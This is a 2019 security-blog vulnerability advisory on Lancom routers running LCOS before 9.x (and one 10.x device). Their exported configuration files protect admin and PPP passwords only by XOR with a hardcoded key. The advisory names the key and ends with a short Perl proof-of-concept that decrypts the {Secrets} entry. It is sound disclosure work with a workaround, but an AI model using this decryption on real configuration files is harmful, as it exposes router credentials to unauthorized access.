WYAE.de - IT Security, KnowHow & Software

2019-11-19

Vulnerability Report: Lancom Router Weak Password Encryption (pre LCOS 9.x)

The enrcyption of passwords in router configuration files can trivially be broken.

Sorry for the late re-discovery - the issue was found and reported in 2009, but had been accidentally buried on my side, and only was re-discovered again in late 2016.

Problem

The enrcyption of passwords in router configuration files can trivially be broken.

Systems affected

System tested: Lancom 1751 UMTS, LCOS 7.62.0042 (dated 05.03.2009)

LANCOM R883+ with Firmware 10.12.0442 (dated 20.07.2018)

Systems affected: all routers running LCOS before v9.x (confirmed by Lancom)

Explanation

When exporting the configuration into a text file you can find the encrypted admin password in the section {Secrets} under the key 2.1 (in this demo case it is "dummy")

{Secrets}
2.1 == 2f1b18091d

The secret is decrypted by simply XORing it byte-wise with the hardcoded String "Knuddelbaerchen" (which is German for "cuddly baby baer")

Fix

The affected LCVOS versions pre-dating LCOS v9.x are no longer supported. Newer models / versions are supposedly not affected.

BUT

@sur5r reported that the bug still is valid on a LANCOM R883+ with Firmware 10.12.0442 (20.07.2018) and affects PPP and admin passwords

Please update to a newer model and handle existing configuration files with care as advised in the manual's Security Checklist (and the "Workaround" section below).

Thank you to Lancom for quicky responding and resolving the issue (Support-ID 1609.2312.0000.KSCH).

Workaround

When exporting the config file, please store it only protected as if it was clear text - as advised in the manual.

When forwarding it to support, vendors or consultants please remove the {Secrets} section (especially the key 2.1).

Proof of Concept

#!/usr/bin/perl -w
#----------------------------------------------------------------------
#
# ./lancom-pw-decrypt.pl ....pw....


$key="Knuddelbaerchen";

$text = pack('H*',$ARGV[0]);

$len = length($text);
$xlen = int((length($text) / length($key))+1);

$result = $text ^ ($key x $xlen);
$result = substr($result,0,$len);

print "$result\n";


#----------------------------------------------------------------------
# 2009/2016       <volker.tanger@wyae.de>
# https://www.wyae.de/volker.tanger/vuln/lancom_password_knuddelbaerchen/